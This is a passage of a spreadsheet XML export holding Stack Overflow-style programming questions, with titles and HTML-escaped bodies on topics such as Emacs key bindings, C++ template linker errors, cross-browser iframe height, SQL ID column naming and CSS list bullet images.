&lt;p&gt;I verified with McCoy tool that the extension is signed, and has the same Id as the old one, etc.  I'm not sure what else to try.  Any advice would be appreciated.  This is with Firefox 3 (and the extension is marked as compatible with it... that didn't change).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the key sequence for closing the current buffer in Emacs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I click on File -&gt; Close, it closes the buffer like I want, but doesn't list a key mapping. What is the key mapping?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Logging Library for .NET Compact Framework?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Any good logging libraries that support .NET compact framework?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best mobile application development tool/environment?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to develop a mobile application that is able to access all the features of the mobile device it runs on (camera, files, phone and network connectivity). I intend to build a series of applications that each have a specific function to perform, rather than a single application with a large feature set. My programming background is C, C# and web applications.&lt;/p&gt;
&lt;p&gt;What would be the best tool set to use to do this? I have looked at using the NetBeansIDE to create a Java ME applications using LWUIT - this looks promising, but what are the caveat's?&lt;/p&gt;
&lt;p&gt;I want to target the largest universe of mobile devices possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Computing a cross-browser iframe height</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;One of the most difficult problems in my javascript experience has been the correct (that is "cross-browser") computing of a &lt;strong&gt;iframe height&lt;/strong&gt;.
In my applications I have a lot of dynamically generated iframe and I want them all do a sort of autoresize at the end of the load event to adjust their height and width.&lt;/p&gt;
&lt;p&gt;In the case of &lt;strong&gt;height&lt;/strong&gt; computing my best solution is the following (with the help of jQuery):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function getDocumentHeight(doc) {
  var mdoc = doc || document;
  if (mdoc.compatMode=='CSS1Compat') {       
      return mdoc.body.offsetHeight;
  }
  else {
    if ($.browser.msie)
      return mdoc.body.scrollHeight;
    else  
      return Math.max($(mdoc).height(), $(mdoc.body).height());
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I searched the internet without success. I also tested Yahoo library that has some methods for document and viewport dimensions, but it's not satisfactory.
My solution works decently, but sometimes it calculates a taller height.
I've studied and tested tons of properties regarding document height in Firefox/IE/Safari: &lt;code&gt;documentElement.clientHeight, documentElement.offsetHeight, documentElement.scrollHeight, body.offsetHeight, body.scrollHeight, ...&lt;/code&gt;
Also jQuery doesn't have a coherent behavior in various browser with the calls &lt;code&gt;$(document.body).height(), $('html', doc).height(), $(window).height()&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I call the above function not only at the end of load event, but also in the case of dynamically inserted DOM elements or elements hidden or shown. This is a case that sometimes breaks the code that works only in the load event.&lt;/p&gt;
&lt;p&gt;Does someone have a real cross-browser (at least Firefox/IE/Safari) solution? Some tips or hints?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Templated superclass linking problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a C++ class, with a templated superclass. The idea being, I can easily create lots of similar subclasses from a number of superclasses which have similar characteristics.&lt;/p&gt;
&lt;p&gt;I have distilled the problematic code as follows:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;template_test.h&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;template&amp;lt;class BaseClass&amp;gt;
class Templated : public BaseClass
    {
public:
    Templated(int a);
    virtual int Foo();
    };
class Base
    {
protected:
    Base(int a);
public:
    virtual int Foo() = 0;
protected:
    int b;
    };
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;template_test.cpp&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include "template_test.h"
Base::Base(int a)
    : b(a+1)
    {
    }
template&amp;lt;class BaseClass&amp;gt;
Templated&amp;lt;BaseClass&amp;gt;::Templated(int a)
    : BaseClass(a)
    {
    }
template&amp;lt;class BaseClass&amp;gt;
int Templated&amp;lt;BaseClass&amp;gt;::Foo()
    {
    return this-&amp;gt;b;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;main.cpp&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include "template_test.h"
int main()
    {
    Templated&amp;lt;Base&amp;gt; test(1);
    return test.Foo();
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I build the code, I get linker errors, saying that the symbols &lt;code&gt;Templated&amp;lt;Base&amp;gt;::Templated(int)&lt;/code&gt; and &lt;code&gt;Templated&amp;lt;Base&amp;gt;::Foo()&lt;/code&gt; cannot be found.&lt;/p&gt;
&lt;p&gt;A quick Google suggests that adding the following to &lt;code&gt;main.cpp&lt;/code&gt; will solve the problem:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;template&amp;lt;&amp;gt; Templated&amp;lt;Base&amp;gt;::Templated(int a);
template&amp;lt;&amp;gt; int Templated&amp;lt;Base&amp;gt;::Foo();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this does not solve the problem. Adding the lines to &lt;code&gt;main.cpp&lt;/code&gt; does not work either. (Though, interestingly, adding them to both gives 'multiply defined symbol' errors from the linker, so they must be doing something...)&lt;/p&gt;
&lt;p&gt;&lt;em&gt;However&lt;/em&gt;, putting all the code in one source file does solve the problem. While this would be ok for the noddy example above, the real application I'm looking at would become unmanageable very fast if I was forced to put the whole lot in one cpp file.&lt;/p&gt;
&lt;p&gt;Does anyone know if what I'm doing is even possible? (How) can I solve my linker errors?&lt;/p&gt;
&lt;p&gt;I would assume that I could make all the methods in &lt;code&gt;class Templated&lt;/code&gt; inline and this would work, but this doesn't seem ideal either.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What causes this integer pointer reassignment to crash?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am new to C and i have this question. why does the following code crash:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int *a = 10;
*a = 100;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Redirect to a link using the default broswser in Windows Form based application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am not use: Process.Start (String, String) to open a link. But every time the browser open a new tab or new window to open the link.
Is there a way that to open the link in the latest opened page? Just redirection, no new tab or new window?
Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I use RLIKE MySQL function inside of SQL Server 2005?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to run a RLIKE query on a database mmoved from MySQL to SQL Server 2005 however having problems replicating the "RLIKE" functionality that MySQL provides.&lt;/p&gt;
&lt;p&gt;Does anyone have any ideas?&lt;/p&gt;
&lt;p&gt;Cheers,&lt;/p&gt;
&lt;p&gt;Chris&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get Srcsrv with SVNindex.cmd to index extern files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have recently made use of the SrcSrv feature in the &lt;a href="http://www.microsoft.com/whdc/devtools/debugging/default.mspx" rel="nofollow"&gt;Debugging Tools For Windows&lt;/a&gt;, but have noticed that when I index the pdb with &lt;strong&gt;SVNIndex.cmd&lt;/strong&gt; it does not pick up any of the files that are from an &lt;a href="http://svnbook.red-bean.com/en/1.0/ch07s03.html" rel="nofollow"&gt;external link&lt;/a&gt;. &lt;/p&gt;
&lt;p&gt;Any suggestions ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to read and write multiple files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to write a program for this: In a folder I have &lt;em&gt;n&lt;/em&gt; number of files; first read one file and perform some operation then store result in a separate file. Then read 2nd file, perform operation again and save result in new 2nd file. Do the same procedure for &lt;em&gt;n&lt;/em&gt; number of files. The program reads all files one by one and stores results of each file separately. Please give examples how I can do it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Forcibly rollback an installer in c# setup projects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created a custom action dll.I just want to check if a product with same name exists(Done).If yes tell the user to uninstall the product by throwing a InstallException.However if the products are installed in same directory the Install state of the prev product is removed &amp;amp; the install state of new product is copied in the base directory,due to which the prev product cannot be uninstalled.Is there any procedure to achieve a solution to this problem.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How are most AS3 Video Players Created?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are most flash video players created all programmatically? Or they done using static buttons that are referenced in classes? Is it better to create all your buttons on the fly or does it not really matter?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to summarize view-components/widgets-information in a JAR-File?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to use an ajax toolkit/framework like ZK (www.zkoss.org) or GWT. But I don't know whether it's possible to bundle resources in a JAR? Do you know which one support such resource loading?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When should the Win32 InterlockedExchange function be used?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I came across the function &lt;a href="http://msdn.microsoft.com/en-us/library/ms683590(VS.85).aspx"&gt;InterlockedExchange&lt;/a&gt; and was wondering when I should use this function. In my opinion, setting a 32 Bit value on an x86 processor should always be atomic? &lt;br/&gt;
In the case where I want to use the function, the new value does not depend on the old value (it is not an increment operation).
Could you provide an example where this method is mandatory (I'm not looking for InterlockedCompareExchange)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does MSI require the original .msi file to proceed with an uninstall?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As most of you probably noticed, when uninstalling an MSI package Windows will ask for the original &lt;code&gt;.msi&lt;/code&gt; file. Why is that?&lt;/p&gt;
&lt;p&gt;I can only see disadvantages to that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;not resilient to network changes.&lt;/li&gt;
&lt;li&gt;not resilient to local disk changes.&lt;/li&gt;
&lt;li&gt;unexpected by users.&lt;/li&gt;
&lt;li&gt;typically requires users to leave their desk and start a crusade to get the correct CD.&lt;/li&gt;
&lt;li&gt;kind of proves installations are not self-contained.&lt;/li&gt;
&lt;li&gt;promotes the use of unsafe tools such as msizap.&lt;/li&gt;
&lt;li&gt;which in turn promotes the "next time I'll just use a zip file" mentality.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Could someone shed some light on this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get the instance value of a property marked with a Attribute?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a class which is marked with a custom attribute, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class OrderLine : Entity
{
    ...
    [Parent]
    public Order Order { get; set; }
    public Address ShippingAddress{ get; set; }
    ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to write a generic method, where I need to get the Property on a Entity which is marked with the  Parent attribute.&lt;/p&gt;
&lt;p&gt;Here is my Attribute:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[AttributeUsage(AttributeTargets.Property, AllowMultiple = false, Inherited = false)]
public class ParentAttribute : Attribute
{
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I write this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Naming of ID columns in database tables</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering peoples opinions on the naming of ID columns in database tables.&lt;/p&gt;
&lt;p&gt;If I have a table called Invoices with a primary key of an identity column I would call that column InvoiceID so that I would not conflict with other tables and it's obvious what it is.&lt;/p&gt;
&lt;p&gt;Where I am workind current they have called all ID columns ID.&lt;/p&gt;
&lt;p&gt;So they would do the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Select  
    i.ID 
,   il.ID 
From
    Invoices i
    Left Join InvoiceLines il
        on i.ID = il.InvoiceID
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, I see a few problems here:&lt;br /&gt;
1. You would need to alias the columns on the select&lt;br /&gt;
2. ID = InvoiceID does not fit in my brain&lt;br /&gt;
3. If you did not alias the tables and referred to InvoiceID is it obvious what table it is on?&lt;/p&gt;
&lt;p&gt;What are other peoples thoughts on the topic?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the reasoning for and the basic concepts behind an interstitial loading page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm interested in finding out why this is used on some Web sites for processing user-initiated search submissions, how it affects the request and response flow, and programmatically why it would be necessary (or beneficial). In an MVC framework it seems difficult to execute since you are injecting another page into the middle of the flow.&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;Not advertising related. For instance, most travel sites used to do this, and there were no ads... some banking sites do it too, where there is just a loader that says something like "Please wait while we process your transaction...".&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Export all contacts as vcards from Outlook</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, I want to export all my contacts from Outlook as vcards. If I google that, I get a bunch of shareware programs, but I want something free that just works. &lt;/p&gt;
&lt;p&gt;If I'm to code it myself, I guess I should use the Microsoft.Office.Interop.Outlook assembly. Has anyone already code to convert ContactItems to vcards?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; I solved it in a completely different way, see answer below, but I have marked dok1.myopenid.com's answer as accepted because it answers my original question. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Aggregate Login Control [ASP.NET]</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a control out in the world that allows a user to log in to a website with MS Passport (Windows Live ID, whatever), Facebook, OpenID, etc. all in one control?&lt;/p&gt;
&lt;p&gt;Thanks, everyone!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MFC: Showing / Hiding Splitter Panes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my application I have a number of panes from m_wndspliter classes. What I want to do is at run time show and hide one of these panes. Whilst with the following code I can show and hide the view associated with the pane, I can't temporarily remove the pane itself. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CWnd * pCurView = m_wndSplitter2.GetPane(2, 0);
if( !pCurView == NULL )
{
    if( fShow )
    {
        pCurView-&amp;gt;ShowWindow(SW_SHOW);
        RecalcLayout();
    }
    else
    {
        pCurView-&amp;gt;ShowWindow(SW_HIDE);
        RecalcLayout();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any examples / ideas ?&lt;/p&gt;
&lt;p&gt;Thanks all.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.net system tray application to launch when a USB device is plugged in</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I get my .net system tray application to popup when a USB device is plugged in?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Nullable type as a generic parameter possible?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to do something like this :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;myYear = record.GetValueOrNull&amp;lt;int?&amp;gt;("myYear"),
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Notice the nullable type as the generic parameter. &lt;/p&gt;
&lt;p&gt;Since the &lt;code&gt;GetValueOrNull&lt;/code&gt; function could return null my first attempt was this: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static T GetValueOrNull&amp;lt;T&amp;gt;(this DbDataRecord reader, string columnName)
  where T : class
{
    object columnValue = reader[columnName];
    if (!(columnValue is DBNull))
    {
        return (T)columnValue;
    }
    return null;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But the error I'm getting now is:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The type 'int?' must be a reference type in order to use it as parameter 'T' in the generic type or method&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Right! &lt;code&gt;Nullable&amp;lt;int&amp;gt;&lt;/code&gt; is a &lt;code&gt;struct&lt;/code&gt;! So I tried changing the class constraint to a &lt;code&gt;struct&lt;/code&gt; constraint (and as a side effect can't return &lt;code&gt;null&lt;/code&gt; any more):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static T GetValueOrNull&amp;lt;T&amp;gt;(this DbDataRecord reader, string columnName)
  where T : struct
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now the assignment:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;myYear = record.GetValueOrNull&amp;lt;int?&amp;gt;("myYear");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Gives the following error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The type 'int?' must be a non-nullable value type in order to use it as parameter 'T' in the generic type or method&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Is specifying a nullable type as a generic parameter at all possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How much does it cost to develop an iPhone application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How much can a developer charge for an iPhone app like &lt;a href="http://en.wikipedia.org/wiki/Twitterrific"&gt;Twitterrific&lt;/a&gt;?&lt;/p&gt;
&lt;p&gt;I want to know this because I need such an application with the same functionality for a new community website. I can do Ruby but have no experience with Objective-C. So it would be interesting for me if I should start reading books about iPhone programming or outsource the work to a iPhone programmer.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript registering event to object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an activex object I loaded into an html page.  I then use that activex object to create another object, but I need to register an event with the new object created.  The object is expecting an event listener of a certain type.&lt;/p&gt;
&lt;p&gt;I can load this same dll in c# and it will work fine. Code looks like this for c#.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;upload = obj.constructUploadObj(uploadConfig);
upload.stateChanged += new UploadActionEvents_stateChangedEventHandler(upload_stateChanged);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In javascript I have similar code however I cannot get the event registered with the object.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uploadAction = obj.constructUploadObj(uploadConfig);
uploadAction.stateChanged = upload_stateChanged;
function upload_stateChanged(sender){
    writeLine("uploadState changed " + sender.getState());
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have enumerated some of the properties of the uploadAction object in javascript to ensure that it is actually created.  When I try and register the event with uploadAction it throws an error saying "Object doesn't support this property or method."&lt;/p&gt;
&lt;p&gt;To me it seems like its expecting a strongly typed event.  Is there anyway to register the event similar to that of C# in javascript?&lt;/p&gt;
&lt;p&gt;Thanks In Advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I use Python as a Bash replacement?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I currently do my textfile manipulation through a bunch of badly remembered AWK, sed, Bash and a tiny bit of Perl.&lt;/p&gt;
&lt;p&gt;I've seen mentioned a few places that python is good for this kind of thing, I know a little and I would like to know more. Is Python a good choice for this, and is there a good book or guide to learning how to use Python to replace shell scripting, AWK, sed and friends?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Powershell - Increase the timeout for retrieving XML from a URL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to retrieve an XML stream from a URL. For most URLs my code below works fine. But, I have a couple URLs that timeout. The URLs in question &lt;b&gt;do&lt;/b&gt; work from Internet Explorer.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$webclient=New-Object "System.Net.WebClient"
[xml]$data=$webclient.DownloadString($url)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, I went searching for a way to increase the timeout period. From what I've read, I believe I cannot do this using &lt;code&gt;System.Net.WebClient&lt;/code&gt;. I think I need to use &lt;code&gt;System.Net.WebRequest&lt;/code&gt; instead, but I cannot get it to work. The code I've been working on is below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$myHttpWebRequest = [system.net.WebRequest]::Create($url)
$myHttpWebRequest.Timeout = 600000
$myHttpWebResponse = $myHttpWebRequest.GetResponse()
$sr = New-Object System.IO.StreamReader($response.GetResponseStream())
[xml]$xml = [xml]$sr.ReadToEnd()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The URLs I'm trying to access are internal to my company, so I can't post them. But, they do work in IE and the actual URL should be irrelevant.&lt;/p&gt;
&lt;p&gt;Ideas?&lt;/p&gt;
&lt;p&gt;EDIT: Preliminary testing shows that adding &lt;code&gt;$myHttpWebRequest.AuthenticationLevel = "None"&lt;/code&gt; works. Thanks Scott Saad.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Payroll System Design, Business Logic in SPs or Application Layer (C#.Net), Maintainability - Repost</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are designing a Payroll Generation System for a client.&lt;/p&gt;
&lt;p&gt;The organization we are targeting has a hierarchy as follows:
Company -&gt; Cluster -&gt; Business Unit (BU) -&gt; Department -&gt; Employee&lt;/p&gt;
&lt;p&gt;The salary for an employee is made up of various salary components.
Each salary component has 3 rules associated with it, a Calculation Rule (Calculate component as % of another component, or % of a fixed number or a fixed number), an Eligibility Rule (whether an Employee/Dept is eligible for a component) and a Constraint Rule which limits tha max and min of a component.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;**These rules are editable and can be edited by a user end user&lt;/strong&gt;. Also these rules are inherited top-down, but if defined at a lower level, the lower level rule takes precedence.**&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We have a database which has Attendance, Leaves, Bonuses tables and these rules are also supposed to interact with these tables.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The client will be generating payroll for multiple clients each hosting a Separate Database instance. They may each have a different interpretation of each component and may have different components.&lt;/p&gt;
&lt;p&gt;We are only looking to support SQL Server, and payroll generation will be an offline activity.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We are divided upon where to put the logic which uses these rules to generate the individual tax components (which will include Tax Deductions, Tax Write-offs, Allowances, etc).&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Some people are advocating magic SPs which will take an employee Id and generate a payroll for that month.
Others want the logic to be split into separate components which will get the dependent data for an employee in the application layer and calculate these components there.&lt;/p&gt;
&lt;p&gt;The order of our priorities are:
1. The ability to adapt changes to new clients quickly
2. Long term maintainability
3. Performance&lt;/p&gt;
&lt;p&gt;1 and 2 outweigh 3 here by a large factor as this will be an offline activity.&lt;/p&gt;
&lt;p&gt;Maintainability and Quick Customizability are very important, we will be deploying the application for different clients.
Client A may have a Salary Component Rule as ((0.3 * Basic) + 800)
and Client B as (0.2 * Basic) + (0.1 * Atendance Bonus)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Will SPs cause a mess here, as the rules suggested above will be specified by the end user and will need to be customizable through a web UI.
We will have to parse the formulas from SQL. How difficult or easy will it be?
What advantage will doing this in the Application Layer (C# .Net) have over using SPs?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The original post is here:
&lt;a href="http://stackoverflow.com/questions/208707/design-hints-payroll-systemrepost"&gt;http://stackoverflow.com/questions/208707/design-hints-payroll-systemrepost&lt;/a&gt;
...but none of the questions were properly answered.&lt;/p&gt;
&lt;p&gt;Suggestions and pointers to existing systems' architecture will be very helpful.
...and yes, we are using LINQ to SQL elsewhere in the system.&lt;/p&gt;
&lt;p&gt;Kind regards,
Ashish Sharma&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good freeware clone of the VMS editor EDT for unix or the pc?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to have the same editor available on all of the platforms I frequent.&lt;/p&gt;
&lt;p&gt;Emacs and Vi are not desired solutions.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Algorithm to order 'tag line' campaigns based on resulting sales</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to be able to introduce new 'tag lines' into a database that are shown 'randomly' to users. (These tag lines are shown as an introduction as animated text.)&lt;/p&gt;
&lt;p&gt;Based upon the number of sales that result from those taglines I'd like the good ones to trickle to the top, but still show the others less frequently.&lt;/p&gt;
&lt;p&gt;I could come up with a basic algorithm quite easily but I want something thats a little more 'statistically accurate'.&lt;/p&gt;
&lt;p&gt;I dont really know where to start. Its been a while since I've done anything more than basic statistics. My model would need to be sensitive to tolerances, but obviously it doesnt need to be worthy of a PHD.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; I am currently tracking a 'conversion rate' - i.e. hits per order. This value would probably be best calculated as a cumulative 'all time' convertsion rate to be fed into the algorithm.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Map two lists into a dictionary in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Imagine that you have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;keys = ('name', 'age', 'food')
values = ('Monty', 42, 'spam')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is the simplest way to produce the following dictionary ?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dict = {'name' : 'Monty', 'age' : 42, 'food' : 'spam'}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code works, but I'm not really proud of it :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dict = {}
junk = map(lambda k, v: dict.update({k: v}), keys, values)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Pulling data out of quotes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a regex that can pull out quoted sections in a string, both single and double quotes.&lt;/p&gt;
&lt;p&gt;IE:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"This is 'an example', \"of an input string\""
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Matches:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;an example&lt;/li&gt;
&lt;li&gt;of an input string&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I wrote up this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; [\"|'][A-Za-z0-9\\W]+[\"|']
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It works but does anyone see any flaws with it?&lt;/p&gt;
&lt;p&gt;EDIT: The main issue I see is that it can't handle nested quotes.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Giving a custom UserControl an ID in rendered HTML</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I use a ASP:Calendar control, and give it an ID:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;&amp;lt;asp:Calendar runat="server" ID="MyCal" /&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;It looks like this in the rendered html:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;&amp;lt;table id="NameMangled_MyCal"... /&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;And I can access the element by ID in javascript like this:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;var cal= document.getElementById("&amp;lt;%= MyCal.ClientID%&amp;gt;")&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;However,&lt;/strong&gt; When I make a custom user control that has-a calendar:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%@ Control Language="C#" AutoEventWireup="true" CodeFile="WeeklyEventsCalendar.ascx.cs"
    Inherits="WeeklyEventsCalendar" %&amp;gt;
&amp;lt;div&amp;gt;
    &amp;lt;asp:Calendar runat="server" ID="InnerCal" Width="100%" OnDayRender="RenderCell" OnVisibleMonthChanged="ChangeMonth" Height="480px" /&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then give it an ID when I add it to my page...&lt;/p&gt;
&lt;p&gt;&lt;code&gt; &amp;lt;mvs:WeeklyEventsCalendar ID="WeeklyCal" runat="server" /&amp;gt;&lt;/code&gt; &lt;/p&gt;
&lt;p&gt;That ID doesn't show up anywhere in the rendered HTML. all I get is &lt;/p&gt;
&lt;p&gt;&lt;code&gt;&amp;lt;div&amp;gt; stuff &amp;lt;/div&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;When I want&lt;/p&gt;
&lt;p&gt;&lt;code&gt;&amp;lt;div id="NameMangled_WeeklyCal"&amp;gt; stuff &amp;lt;div&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;What am I doing wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I give each &lt;li&gt; its own bullet image?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have tried&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul id="contact_list"&amp;gt;
    &amp;lt;li id="phone"&amp;gt;Local 604-555-5555&amp;lt;/li&amp;gt;
    &amp;lt;li id="i18l_phone"&amp;gt;Toll-Free 1-800-555-5555&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;with&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#contact_list
{
    list-style: disc none inside;
}
#contact_list #phone
{
    list-style-image: url(images/small_wood_phone.png);
}
#contact_list #i18l_phone
{
    list-style-image: url(images/i18l_wood_phone.png);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to no avail. Only a disc appears. If I want each individual list item to have it's own bullet, how can I accomplish this with css, &lt;strong&gt;&lt;em&gt;without using background images&lt;/em&gt;&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Edit : I have discovered that, despite what firebug tells me, the list-style-image rule is being overridden somehow. If I inline the rule, like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    &amp;lt;li id="phone" style="list-style-image: url(images/small_wood_phone.png);"&amp;gt;Local 604-555-5555&amp;lt;/li&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
